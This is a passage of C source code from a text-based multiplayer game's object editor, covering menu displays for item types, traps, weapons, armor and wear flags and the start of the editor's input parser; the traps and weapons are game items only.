% 4 == 3) write_to_output(d, "\r\n"); } } buf = "\r\nWhat feat should be modified : "; break; /* case APPLY_SKILL: buf = "What skill should be modified : "; break; */ default: oedit_disp_prompt_apply_menu(d); return; } write_to_output(d, "\r\n%s", buf); OLC_MODE(d) = OEDIT_APPLYSPEC; } #endif /* Ask for liquid type. */ static void oedit_liquid_type(struct descriptor_data *d) { get_char_colors(d->character); clear_screen(d); column_list(d->character, 0, drinks, NUM_LIQ_TYPES, TRUE); write_to_output(d, "\r\n%sEnter drink type : ", nrm); OLC_MODE(d) = OEDIT_VALUE_3; } /* The actual apply to set. */ static void oedit_disp_apply_menu(struct descriptor_data *d) { get_char_colors(d->character); clear_screen(d); column_list(d->character, 0, apply_types, NUM_APPLIES, TRUE); write_to_output(d, "\r\nEnter apply type (0 is no apply)\r\n(for 'grant feat' select featnum here, 'featlist' out of editor for master list) : "); OLC_MODE(d) = OEDIT_APPLY; } /* Weapon type. */ /* static void oedit_disp_weapon_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_ATTACK_TYPES; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, attack_hit_text[counter].singular, !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter weapon type : "); } */ static void oedit_disp_portaltypes_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_PORTAL_TYPES; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, portal_types[counter], !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter portal type : "); } /* ranged combat, weapon-type (like bow vs crossbow) */ static void oedit_disp_ranged_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_RANGED_WEAPONS; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, ranged_weapons[counter], !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter ranged-weapon type : "); } /* instruments for bardic performance */ static void oedit_disp_instrument_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < MAX_INSTRUMENTS; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, instrument_names[counter], !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nSelect instrument type : "); } /* ranged combat, missile-type (like arrow vs bolt) */ static void oedit_disp_missile_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_AMMO_TYPES; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, ammo_types[counter], !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter missile-weapon type : "); } /* Spell type. */ static void oedit_disp_spells_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 1; counter < NUM_SPELLS; counter++) { write_to_output(d, "%s%2d%s) %s%-20.20s %s", grn, counter, nrm, yel, spell_info[counter].name, !(++columns % 3) ? "\r\n" : ""); } write_to_output(d, "\r\n%sEnter spell choice (-1 for none) : ", nrm); } static void oedit_disp_trap_type(struct descriptor_data *d) { int counter = 0; write_to_output(d, "\r\n"); for (counter = 0; counter < MAX_TRAP_TYPES; counter++) { write_to_output(d, "%d) %s\r\n", counter, trap_type[counter]); } write_to_output(d, "\r\n%sEnter trap choice # : ", nrm); } static void oedit_disp_trap_effects(struct descriptor_data *d) { int counter = 0; write_to_output(d, "\r\n"); for (counter = TRAP_EFFECT_FIRST_VALUE; counter < TOP_TRAP_EFFECTS; counter++) { write_to_output(d, "%d) %s\r\n", counter, trap_effects[counter - 1000]); } write_to_output(d, "\r\n%s(You can also choose any spellnum)\r\n", nrm); write_to_output(d, "%sEnter effect # : ", nrm); } static void oedit_disp_trap_direction(struct descriptor_data *d) { int counter = 0; write_to_output(d, "\r\n"); for (counter = 0; counter < NUM_OF_INGAME_DIRS; counter++) { write_to_output(d, "%d) %s\r\n", counter, dirs[counter]); } write_to_output(d, "\r\n%sEnter direction # : ", nrm); } void oedit_disp_armor_type_menu(struct descriptor_data *d) { const char *armor_types[NUM_SPEC_ARMOR_TYPES - 1]; int i = 0; /* we want to use column_list here, but we don't have a pre made list * of string values (without undefined). Make one, and make sure it is in order. */ for (i = 0; i < NUM_SPEC_ARMOR_TYPES - 1; i++) { armor_types[i] = armor_list[i + 1].name; } column_list(d->character, 3, armor_types, NUM_SPEC_ARMOR_TYPES - 1, TRUE); } void oedit_disp_weapon_type_menu(struct descriptor_data *d) { const char *weapon_types[NUM_WEAPON_TYPES - 1]; int i = 0; /* we want to use column_list here, but we don't have a pre made list * of string values (without undefined). Make one, and make sure it is in order. */ for (i = 0; i < NUM_WEAPON_TYPES - 1; i++) { weapon_types[i] = weapon_list[i + 1].name; } column_list(d->character, 3, weapon_types, NUM_WEAPON_TYPES - 1, TRUE); } int compute_ranged_weapon_actual_value(int list_value) { int weapon_types[NUM_WEAPON_TYPES]; int i = 1, counter = 0; for (i = 1; i < NUM_WEAPON_TYPES; i++) { if (IS_SET(weapon_list[i].weaponFlags, WEAPON_FLAG_RANGED)) { weapon_types[counter] = i; /* place weapon type into the array */ counter++; } } for (i = 1; i < counter - 1; i++) { if (i == list_value) { return weapon_types[i]; } } return -1; /* failed */ } /* static void oedit_disp_ranged_weapons_menu(struct descriptor_data *d) { const char *weapon_types[NUM_WEAPON_TYPES]; int i = 1, counter = 0; // we want to use column_list here, but we don't have a pre made list // of string values (without undefined). Make one, and make sure it is in order. for (i = 1; i < NUM_WEAPON_TYPES; i++) { if (IS_SET(weapon_list[i].weaponFlags, WEAPON_FLAG_RANGED)) { weapon_types[counter] = weapon_list[i].name; counter++; } } column_list(d->character, 3, weapon_types, counter, TRUE); } */ /* Object value #1 */ static void oedit_disp_val1_menu(struct descriptor_data *d) { OLC_MODE(d) = OEDIT_VALUE_1; switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_SWITCH: write_to_output(d, "What command to activate switch? (0=pull, 1=push) : "); break; case ITEM_TRAP: oedit_disp_trap_type(d); break; case ITEM_LIGHT: /* values 0 and 1 are unused.. jump to 2 */ oedit_disp_val3_menu(d); break; case ITEM_SCROLL: case ITEM_WAND: case ITEM_STAFF: case ITEM_POTION: write_to_output(d, "Spell level : "); break; case ITEM_WEAPON: /* Weapon Type - Onir */ oedit_disp_weapon_type_menu(d); write_to_output(d, "\r\nChoose a weapon type : "); break; case ITEM_POISON: oedit_disp_spells_menu(d); break; case ITEM_ARMOR: case ITEM_CLANARMOR: /* values 0 is reserved for Apply to AC */ oedit_disp_val2_menu(d); break; case ITEM_CONTAINER: case ITEM_AMMO_POUCH: write_to_output(d, "Max weight to contain (-1 for unlimited) : "); break; case ITEM_DRINKCON: case ITEM_FOUNTAIN: write_to_output(d, "Max drink units (-1 for unlimited) : "); break; case ITEM_FOOD: write_to_output(d, "Hours to fill stomach : "); break; case ITEM_MONEY: write_to_output(d, "Number of gold coins : "); break; case ITEM_PORTAL: oedit_disp_portaltypes_menu(d); break; case ITEM_FURNITURE: write_to_output(d, "Number of people it can hold : "); break; /* NewCraft */ case ITEM_BLUEPRINT: write_to_output(d, "Enter Craft ID number : "); break; case ITEM_FIREWEAPON: oedit_disp_ranged_menu(d); break; case ITEM_MISSILE: oedit_disp_missile_menu(d); break; case ITEM_INSTRUMENT: oedit_disp_instrument_menu(d); break; case ITEM_WORN: write_to_output(d, "Special value for worn gear (example gloves for monk-gloves enhancement: "); break; case ITEM_BOAT: // these object types have no 'values' so go back to menu case ITEM_KEY: case ITEM_NOTE: case ITEM_OTHER: case ITEM_PLANT: case ITEM_PEN: case ITEM_TRASH: case ITEM_TREASURE: oedit_disp_menu(d); break; case ITEM_TREASURE_CHEST: oedit_disp_lootbox_levels(d); break; default: mudlog(BRF, LVL_BUILDER, TRUE, "SYSERR: OLC: Reached default case in oedit_disp_val1_menu()!"); break; } } /* Object value #2 */ static void oedit_disp_val2_menu(struct descriptor_data *d) { OLC_MODE(d) = OEDIT_VALUE_2; switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_SWITCH: write_to_output(d, "Which room vnum to manipulate? : "); break; case ITEM_TRAP: switch (GET_OBJ_VAL(OLC_OBJ(d), 0)) { break; case TRAP_TYPE_OPEN_DOOR: case TRAP_TYPE_UNLOCK_DOOR: oedit_disp_trap_direction(d); break; case TRAP_TYPE_OPEN_CONTAINER: case TRAP_TYPE_UNLOCK_CONTAINER: case TRAP_TYPE_GET_OBJECT: write_to_output(d, "VNUM of object trap should apply to : "); break; case TRAP_TYPE_LEAVE_ROOM: case TRAP_TYPE_ENTER_ROOM: default: write_to_output(d, "Press ENTER to continue."); break; } break; case ITEM_SCROLL: case ITEM_POTION: oedit_disp_spells_menu(d); break; case ITEM_POISON: write_to_output(d, "Level of poison : "); break; case ITEM_WAND: case ITEM_STAFF: write_to_output(d, "Max number of charges : "); break; /* Changed to use standard values for weapons. */ /*case ITEM_WEAPON: write_to_output(d, "Number of damage dice (%d) : ", GET_OBJ_VAL(OLC_OBJ(d), 1)); break; */ case ITEM_ARMOR: //case ITEM_CLANARMOR: /* Armor Type - zusuk */ oedit_disp_armor_type_menu(d); write_to_output(d, "\r\nChoose an armor type : "); break; case ITEM_FIREWEAPON: write_to_output(d, "Number of damage dice : "); break; case ITEM_MISSILE: //write_to_output(d, "Size of damage dice : "); break; case ITEM_FOOD: oedit_disp_spells_menu(d); /* Values 2 and 3 are unused, jump to 4...Odd. */ // oedit_disp_val4_menu(d); break; case ITEM_AMMO_POUCH: case ITEM_CONTAINER: /* These are flags, needs a bit of special handling. */ oedit_disp_container_flags_menu(d); break; case ITEM_DRINKCON: case ITEM_FOUNTAIN: write_to_output(d, "Initial drink units : "); break; case ITEM_CLANARMOR: write_to_output(d, "Clan ID Number: "); break; case ITEM_INSTRUMENT: write_to_output(d, "Enter how much instrument reduces difficulty (0-30): "); break; case ITEM_PORTAL: switch (GET_OBJ_VAL(OLC_OBJ(d), 0)) { case PORTAL_NORMAL: case PORTAL_CHECKFLAGS: write_to_output(d, "Room VNUM portal points to : "); break; case PORTAL_RANDOM: write_to_output(d, "Lowest room VNUM in range : "); break; /* Always sends player to their own clanhall - no room required */ case PORTAL_CLANHALL: oedit_disp_menu(d); break; } break; case ITEM_TREASURE_CHEST: oedit_disp_lootbox_types(d); break; default: oedit_disp_menu(d); } } /* Object value #3 */ static void oedit_disp_val3_menu(struct descriptor_data *d) { OLC_MODE(d) = OEDIT_VALUE_3; switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_SWITCH: write_to_output(d, "Which direction? (0=n, 1=e, 2=s, 3=w, 4=u, 5=d) : "); break; case ITEM_TRAP: oedit_disp_trap_effects(d); break; case ITEM_LIGHT: write_to_output(d, "Number of hours (0 = burnt, -1 is infinite) : "); break; case ITEM_POISON: write_to_output(d, "Applications : "); break; case ITEM_INSTRUMENT: write_to_output(d, "Instrument Level (0-10): "); break; case ITEM_FOOD: /* val 3 is unused, jump to 4 */ oedit_disp_val4_menu(d); break; case ITEM_SCROLL: case ITEM_POTION: oedit_disp_spells_menu(d); break; case ITEM_WAND: case ITEM_STAFF: write_to_output(d, "Number of charges remaining : "); break; /* Use standard values for weapons */ /* case ITEM_WEAPON: write_to_output(d, "Size of damage dice : "); break; */ case ITEM_FIREWEAPON: write_to_output(d, "Breaking probability : "); break; case ITEM_MISSILE: write_to_output(d, "Breaking probability : "); break; case ITEM_CONTAINER: case ITEM_AMMO_POUCH: write_to_output(d, "Vnum of key to open container (-1 for no key) : "); break; case ITEM_DRINKCON: case ITEM_FOUNTAIN: oedit_liquid_type(d); break; case ITEM_PORTAL: switch (GET_OBJ_VAL(OLC_OBJ(d), 0)) { case PORTAL_NORMAL: case PORTAL_CHECKFLAGS: oedit_disp_menu(d); /* We are done for these portal types */ break; case PORTAL_RANDOM: write_to_output(d, "Highest room VNUM in range : "); break; } break; default: oedit_disp_menu(d); } } /* Object value #4 */ static void oedit_disp_val4_menu(struct descriptor_data *d) { OLC_MODE(d) = OEDIT_VALUE_4; switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_SWITCH: write_to_output(d, "Which command (0=unhide, 1=unlock, 2=open) : "); break; case ITEM_TRAP: write_to_output(d, "Recommendations:\r\n"); write_to_output(d, "DC = 20 + level-of-trap for a normal trap\r\n"); write_to_output(d, "DC = 30 + level-of-trap for a hard trap\r\n"); write_to_output(d, "DC = 40 + level-of-trap for an epic trap\r\n"); write_to_output(d, "Enter trap difficulty class (DC) : "); break; case ITEM_SCROLL: case ITEM_POTION: case ITEM_WAND: case ITEM_STAFF: oedit_disp_spells_menu(d); break; case ITEM_POISON: write_to_output(d, "Hits per Application : "); break; case ITEM_INSTRUMENT: write_to_output(d, "Instrument Breakability (0 = unbreakable, 2000 = will " "break on first use) (recommended values 0-30): "); break; case ITEM_WEAPON: //oedit_disp_weapon_menu(d); break; case ITEM_MISSILE: //oedit_disp_weapon_menu(d); break; case ITEM_DRINKCON: case ITEM_FOUNTAIN: write_to_output(d, "Spell # (0 = no spell) : "); break; case ITEM_FOOD: write_to_output(d, "Poisoned (0 = not poison) : "); break; default: oedit_disp_menu(d); } } /* Object value #5 */ static void oedit_disp_val5_menu(struct descriptor_data *d) { OLC_MODE(d) = OEDIT_VALUE_5; switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_WEAPON: write_to_output(d, "Enhancement bonus : "); break; case ITEM_ARMOR: write_to_output(d, "Enhancement bonus : "); break; case ITEM_MISSILE: write_to_output(d, "Enhancement bonus : "); break; default: oedit_disp_menu(d); } } static void oedit_disp_specab_val1_menu(struct descriptor_data *d) { OLC_MODE(d) = OEDIT_SPECAB_VALUE_1; switch (OLC_SPECAB(d)->ability) { case WEAPON_SPECAB_BANE: oedit_disp_specab_bane_race(d); break; case ITEM_SPECAB_HORN_OF_SUMMONING: write_to_output(d, "Enter the vnum of the mob to summon : "); break; default: OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); } } static void oedit_disp_specab_val2_menu(struct descriptor_data *d) { OLC_MODE(d) = OEDIT_SPECAB_VALUE_2; switch (OLC_SPECAB(d)->ability) { case WEAPON_SPECAB_BANE: oedit_disp_specab_bane_subrace(d); break; default: OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); } } /* Object type. */ static void oedit_disp_type_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_ITEM_TYPES; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, item_types[counter], !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter object type : "); } // item proficiency /* static void oedit_disp_prof_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_ITEM_PROFS; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, item_profs[counter], !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter object proficiency : "); } */ // item material static void oedit_disp_mats_menu(struct descriptor_data *d) { int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_MATERIALS; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, material_name[counter], !(++columns % 2) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter object material : "); } /* Object extra flags. */ static void oedit_disp_extra_menu(struct descriptor_data *d) { char bits[MAX_STRING_LENGTH]; int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_ITEM_FLAGS; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter + 1, nrm, extra_bits[counter], !(++columns % 2) ? "\r\n" : ""); } sprintbitarray(GET_OBJ_EXTRA(OLC_OBJ(d)), extra_bits, EF_ARRAY_MAX, bits); write_to_output(d, "\r\nObject flags: %s%s%s\r\n" "Enter object extra flag (0 to quit) : ", cyn, bits, nrm); } /* Object perm flags. */ static void oedit_disp_perm_menu(struct descriptor_data *d) { char bits[MAX_STRING_LENGTH]; int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 1; counter < NUM_AFF_FLAGS; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter, nrm, affected_bits[counter], !(++columns % 2) ? "\r\n" : ""); } sprintbitarray(GET_OBJ_PERM(OLC_OBJ(d)), affected_bits, EF_ARRAY_MAX, bits); write_to_output(d, "\r\nObject permanent flags: %s%s%s\r\n" "Enter object perm flag (0 to quit) : ", cyn, bits, nrm); } /* Object size */ void oedit_disp_size_menu(struct descriptor_data *d) { int counter, columns = 0; clear_screen(d); for (counter = 0; counter < NUM_SIZES; counter++) { write_to_output(d, "%2d) %-20.20s%s", counter + 1, size_names[counter], !(++columns % 3) ? "\r\n" : ""); } write_to_output(d, "\r\nEnter object size : "); } /* Object wear flags. */ static void oedit_disp_wear_menu(struct descriptor_data *d) { char bits[MAX_STRING_LENGTH]; int counter, columns = 0; get_char_colors(d->character); clear_screen(d); for (counter = 0; counter < NUM_ITEM_WEARS; counter++) { write_to_output(d, "%s%2d%s) %-20.20s %s", grn, counter + 1, nrm, wear_bits[counter], !(++columns % 2) ? "\r\n" : ""); } sprintbitarray(GET_OBJ_WEAR(OLC_OBJ(d)), wear_bits, TW_ARRAY_MAX, bits); write_to_output(d, "\r\nWear flags: %s%s%s\r\n" "Enter wear flag, 0 to quit : ", cyn, bits, nrm); } bool remove_special_ability(struct obj_data *obj, int number) { bool deleted = FALSE; int i; struct obj_special_ability *specab, *prev_specab; specab = obj->special_abilities; prev_specab = NULL; for (i = 1; (i < number) && (specab != NULL); i++) { prev_specab = specab; specab = specab->next; } /* Check to see if we found the ability. */ if ((i == number) && (specab != NULL)) { deleted = TRUE; /* Remove it from the list. */ if (prev_specab == NULL) obj->special_abilities = specab->next; else prev_specab->next = specab->next; /* Free up the memory. */ if (specab->command_word != NULL) free(specab->command_word); free(specab); } return deleted; } struct obj_special_ability *get_specab_by_position(struct obj_data *obj, int position) { int i; struct obj_special_ability *specab, *prev_specab; specab = obj->special_abilities; prev_specab = NULL; for (i = 1; (i < position) && (specab != NULL); i++) { prev_specab = specab; specab = specab->next; } return specab; } /* Display main menu. */ static void oedit_disp_menu(struct descriptor_data *d) { char buf1[MAX_STRING_LENGTH] = {'\0'}; char buf2[MAX_STRING_LENGTH] = {'\0'}; char buf3[MAX_STRING_LENGTH] = {'\0'}; struct obj_data *obj = OLC_OBJ(d); //int i = 0; size_t len = 0; get_char_colors(d->character); clear_screen(d); /* Build buffers for object type */ sprinttype(GET_OBJ_TYPE(obj), item_types, buf1, sizeof(buf1)); /* build buffer for obj extras */ sprintbitarray(GET_OBJ_EXTRA(obj), extra_bits, EF_ARRAY_MAX, buf2); /* Build first half of menu. */ write_to_output(d, "-- Item number : [%s%d%s]\r\n" "%s1%s) Keywords : %s%s\r\n" "%s2%s) S-Desc : %s%s\r\n" "%s3%s) L-Desc :-\r\n%s%s\r\n" "%s4%s) A-Desc :-\r\n%s%s" "%s5%s) Type : %s%s\r\n" //"%sG%s) Proficiency : %s%s\r\n" "%s6%s) Extra flags : %s%s\r\n", cyn, OLC_NUM(d), nrm, grn, nrm, yel, (obj->name && *obj->name) ? obj->name : "undefined", grn, nrm, yel, (obj->short_description && *obj->short_description) ? obj->short_description : "undefined", grn, nrm, yel, (obj->description && *obj->description) ? obj->description : "undefined", grn, nrm, yel, (obj->action_description && *obj->action_description) ? obj->action_description : "Not Set.\r\n", grn, nrm, cyn, buf1, //grn, nrm, cyn, item_profs[GET_OBJ_PROF(obj)], grn, nrm, cyn, buf2); /* Send first half then build second half of menu. */ /* wear slots of gear */ sprintbitarray(GET_OBJ_WEAR(OLC_OBJ(d)), wear_bits, EF_ARRAY_MAX, buf1); /* permanent affections of gear */ sprintbitarray(GET_OBJ_PERM(OLC_OBJ(d)), affected_bits, EF_ARRAY_MAX, buf2); /* build a buffer for displaying suggested worn eq stats -zusuk */ /* we have to fix this so treasure + here are synced! */ if (GET_OBJ_RNUM(obj) != NOTHING) { if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_FINGER)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-finger:wis,will,hp,res-fire,res-punc,res-illus,res-energy] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_NECK)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-neck:int,save-ref,res-cold,res-air,res-force,res-mental,res-water] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_BODY)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-body:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_HEAD)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-head:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_LEGS)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-legs:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_FEET)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-feet:res-poison,dex,moves] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_HANDS)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-hands:res-disease,res-slice,str] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_ARMS)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-arms:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_SHIELD)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-shield:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_ABOUT)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-about:res-acid,cha,res-negative] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_WAIST)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-waist:res-holy,con,res-earth] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_WRIST)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-wrist:save-fort,psp,res-elec,res-unholy,res-sound,res-light] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_WIELD)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-wield:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_HOLD)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-hold:int,cha,hps] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_FACE)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-face:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_AMMO_POUCH)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-ammopouch:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_EAR)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-ear:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_EYES)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-eyes:NONE] "); if (IS_SET_AR(GET_OBJ_WEAR(obj), ITEM_WEAR_BADGE)) len += snprintf(buf3 + len, sizeof(buf3) - len, "[wear-badge:NONE] "); } /* end eq-wear suggestions */ write_to_output(d, "%s7%s) Wear flags : %s%s\r\n" "%sH%s) Material : %s%s\r\n" "%s8%s) Weight : %s%d\r\n" "%sI%s) Size : %s%s\r\n" "%s9%s) Cost : %s%d\r\n" "%sA%s) Cost/Day : %s%d\r\n" "%sB%s) Timer : %s%d\r\n" "%sC%s) Values : %s%d %d %d %d %d %d %d %d\r\n" " %d %d %d %d %d %d %d %d\r\n" "%sD%s) Applies menu\r\n" "%sE%s) Extra descriptions menu: %s%s%s\r\n" "%sF%s) Weapon Spells : %s%s\r\n" "%sJ%s) Special Abilities : %s%s\r\n" "%sM%s) Min Level : %s%d\r\n" "%sP%s) Perm Affects : %s%s\r\n" "%sS%s) Script : %s%s\r\n" "%sT%s) Spellbook menu\r\n" "%sEQ Rating (save/exit to update, under development): %s%d\r\n" "%sSuggested affections (save/exit first): %s%s\r\n" "%sW%s) Copy object\r\n" "%sX%s) Delete object\r\n" "%sQ%s) Quit\r\n" "Enter choice : ", grn, nrm, cyn, buf1, grn, nrm, cyn, material_name[GET_OBJ_MATERIAL(obj)], grn, nrm, cyn, GET_OBJ_WEIGHT(obj), grn, nrm, cyn, size_names[GET_OBJ_SIZE(obj)], grn, nrm, cyn, GET_OBJ_COST(obj), grn, nrm, cyn, GET_OBJ_RENT(obj), grn, nrm, cyn, GET_OBJ_TIMER(obj), grn, nrm, cyn, GET_OBJ_VAL(obj, 0), GET_OBJ_VAL(obj, 1), GET_OBJ_VAL(obj, 2), GET_OBJ_VAL(obj, 3), GET_OBJ_VAL(obj, 4), GET_OBJ_VAL(obj, 5), GET_OBJ_VAL(obj, 6), GET_OBJ_VAL(obj, 7), GET_OBJ_VAL(obj, 8), GET_OBJ_VAL(obj, 9), GET_OBJ_VAL(obj, 10), GET_OBJ_VAL(obj, 11), GET_OBJ_VAL(obj, 12), GET_OBJ_VAL(obj, 13), GET_OBJ_VAL(obj, 14), GET_OBJ_VAL(obj, 15), grn, nrm, grn, nrm, cyn, obj->ex_description ? "Set." : "Not Set.", grn, grn, nrm, cyn, HAS_SPELLS(obj) ? "Set." : "Not set.", grn, nrm, cyn, HAS_SPECIAL_ABILITIES(obj) ? "Set." : "Not Set.", grn, nrm, cyn, GET_OBJ_LEVEL(obj), grn, nrm, cyn, buf2, grn, nrm, cyn, OLC_SCRIPT(d) ? "Set." : "Not Set.", grn, nrm, /* spellbook */ nrm, cyn, (GET_OBJ_RNUM(obj) == NOTHING) ? -999 : get_eq_score(GET_OBJ_RNUM(obj)), /* eq rating */ nrm, cyn, (GET_OBJ_RNUM(obj) == NOTHING) ? "save/exit first" : buf3, /* suggestions */ grn, nrm, /* copy object */ grn, nrm, /* delete object */ grn, nrm /* quite */ ); OLC_MODE(d) = OEDIT_MAIN_MENU; } /* main loop (of sorts).. basically interpreter throws all input to here. */ void oedit_parse(struct descriptor_data *d, char *arg) { int number, min_val; long max_val; char *oldtext = NULL; //int this_missile = -1; switch (OLC_MODE(d)) { case OEDIT_CONFIRM_SAVESTRING: switch (*arg) { case 'y': case 'Y': oedit_save_internally(d); mudlog(CMP, MAX(LVL_BUILDER, GET_INVIS_LEV(d->character)), TRUE, "OLC: %s edits obj %d", GET_NAME(d->character), OLC_NUM(d)); if (CONFIG_OLC_SAVE) { oedit_save_to_disk(real_zone_by_thing(OLC_NUM(d))); write_to_output(d, "Object saved to disk.\r\n"); } else write_to_output(d, "Object saved to memory.\r\n"); cleanup_olc(d, CLEANUP_ALL); return; case 'n': case 'N': /* If not saving, we must free the script_proto list. */ OLC_OBJ(d)->proto_script = OLC_SCRIPT(d); free_proto_script(OLC_OBJ(d), OBJ_TRIGGER); cleanup_olc(d, CLEANUP_ALL); return; case 'a': /* abort quit */ case 'A': oedit_disp_menu(d); return; default: write_to_output(d, "Invalid choice!\r\n"); write_to_output(d, "Do you wish to save your changes? : \r\n"); return; } case OEDIT_MAIN_MENU: /* Throw us out to whichever edit mode based on user input. */ switch (*arg) { case 'q': case 'Q': if (OLC_VAL(d)) { /* Something has been modified. */ write_to_output(d, "Do you wish to save your changes? : "); OLC_MODE(d) = OEDIT_CONFIRM_SAVESTRING; } else cleanup_olc(d, CLEANUP_ALL); return; case '1': write_to_output(d, "Enter keywords : "); OLC_MODE(d) = OEDIT_KEYWORD; break; case '2': write_to_output(d, "Enter short desc : "); OLC_MODE(d) = OEDIT_SHORTDESC; break; case '3': write_to_output(d, "Enter long desc :-\r\n| "); OLC_MODE(d) = OEDIT_LONGDESC; break; case '4': OLC_MODE(d) = OEDIT_ACTDESC; send_editor_help(d); write_to_output(d, "Enter action description:\r\n\r\n"); if (OLC_OBJ(d)->action_description) { write_to_output(d, "%s", OLC_OBJ(d)->action_description); oldtext = strdup(OLC_OBJ(d)->action_description); } string_write(d, &OLC_OBJ(d)->action_description, MAX_MESSAGE_LENGTH, 0, oldtext); OLC_VAL(d) = 1; break; case '5': oedit_disp_type_menu(d); OLC_MODE(d) = OEDIT_TYPE; break; //case 'g': //case 'G': //oedit_disp_prof_menu(d); //OLC_MODE(d) = OEDIT_PROF; //break; case 'h': case 'H': oedit_disp_mats_menu(d); OLC_MODE(d) = OEDIT_MATERIAL; break; case '6': oedit_disp_extra_menu(d); OLC_MODE(d) = OEDIT_EXTRAS; break; case '7': oedit_disp_wear_menu(d); OLC_MODE(d) = OEDIT_WEAR; break; case '8': write_to_output(d, "Enter weight : "); OLC_MODE(d) = OEDIT_WEIGHT; break; case 'i': case 'I': oedit_disp_size_menu(d); OLC_MODE(d) = OEDIT_SIZE; break; case '9': write_to_output(d, "Enter cost : "); OLC_MODE(d) = OEDIT_COST; break; case 'a': case 'A': write_to_output(d, "Enter cost per day : "); OLC_MODE(d) = OEDIT_COSTPERDAY; break; case 'b': case 'B': write_to_output(d, "Enter timer : "); OLC_MODE(d) = OEDIT_TIMER; break; case 'c': case 'C': /* Clear any old values */ GET_OBJ_VAL(OLC_OBJ(d), 0) = 